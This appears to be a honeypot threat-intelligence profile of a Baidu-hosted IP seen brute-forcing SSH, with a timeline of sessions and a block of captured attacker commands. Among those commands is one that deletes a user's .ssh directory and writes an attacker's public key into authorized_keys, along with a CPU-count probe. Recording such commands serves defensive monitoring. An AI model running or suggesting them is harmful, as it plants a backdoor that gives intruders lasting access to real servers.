
106.13.96.57

Threat Confidence
57%
Location
🇨🇳 CN
ASN
AS38365 · Beijing Baidu Netcom Science and Technology Co., Ltd.
Cloud Provider
Total Events
113
Above average by volume
Agent Count
1
First / Last Seen
2026-04-30 20:09 — 2026-05-05 18:28
Attack Types
ssh:bruteforce
MITRE ATT&CK Techniques
Reconnaissance
Initial Access
Defense Evasion
Credential Access
Discovery
Command and Control
External Corroboration
Blocklist.de
Reported 2026-05-05 19:01
blocklist_de:reported
Session Forensics
scanner ×21 malware_dropper ×3 credential_probe ×2
Sessions
26 (3 with login)
Avg Depth Score
0.25
Commands Executed
10
Files Downloaded
3
Notable Commands
  • cd ~; chattr -ia .ssh; lockr -ia .ssh
  • lockr -ia .ssh
  • cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
  • cat /proc/cpuinfo | grep name | wc -l
Fingerprints
SSH-2.0-libssh_0.12.0
Evidence Timeline
Scanner 2362b68c5df1 w4m_singapore_01 · 2026-05-05 18:28
15%
Scanner def6d9ba8bd7 w4m_singapore_01 · 2026-05-05 18:27
15%
Scanner 7fa07be53e5f w4m_singapore_01 · 2026-05-05 18:25
15%
Scanner aad20d547eae w4m_singapore_01 · 2026-05-05 18:24
15%
Scanner c36f3df2f5d2 w4m_singapore_01 · 2026-05-05 18:19
15%
Malware Dropper 6e40912d88d8 w4m_singapore_01 · 2026-05-05 18:19
4 1 1 100%
Scanner 5eb837f856e8 w4m_singapore_01 · 2026-05-05 18:19
15%
Scanner bb39d6303212 w4m_singapore_01 · 2026-05-05 18:18
15%
Scanner b5ac572b184d w4m_singapore_01 · 2026-05-05 18:16
15%
Scanner df4c7dd623c8 w4m_singapore_01 · 2026-05-05 18:15
15%
Scanner ec36ec0582f3 w4m_singapore_01 · 2026-05-05 18:11
15%
Malware Dropper 1903d075ead0 w4m_singapore_01 · 2026-05-05 18:10
3 1 1 100%
Scanner f579a1aa632d w4m_singapore_01 · 2026-05-05 18:09
15%
Scanner 682761e606f4 w4m_singapore_01 · 2026-05-05 18:05
15%
Scanner 425271448523 w4m_singapore_01 · 2026-05-05 18:06
15%
Scanner f48ce59dbab6 w4m_singapore_01 · 2026-05-05 18:00
15%
Credential Probe de6ea7d7d052 w4m_singapore_01 · 2026-05-05 18:02
1 20%
Scanner 6c83be2332ef w4m_singapore_01 · 2026-05-05 17:58
15%
Scanner 9f0ba5faad3a w4m_singapore_01 · 2026-05-05 17:54
15%
Scanner 4f7fab2832c9 w4m_singapore_01 · 2026-05-05 17:50
15%
Scanner 7c325f40f098 w4m_singapore_01 · 2026-05-05 17:49
15%
Malware Dropper b450258441de w4m_singapore_01 · 2026-05-05 17:49
3 1 1 100%
Scanner 48db7e127990 w4m_singapore_01 · 2026-05-05 17:46
15%
Scanner f5644f87b794 w4m_singapore_01 · 2026-05-05 17:47
15%
Credential Probe 3d34dcc303ef w4m_singapore_01 · 2026-05-05 17:34
1 20%
Scanner d3da7c7503b3 w4m_singapore_01 · 2026-04-30 20:09
15%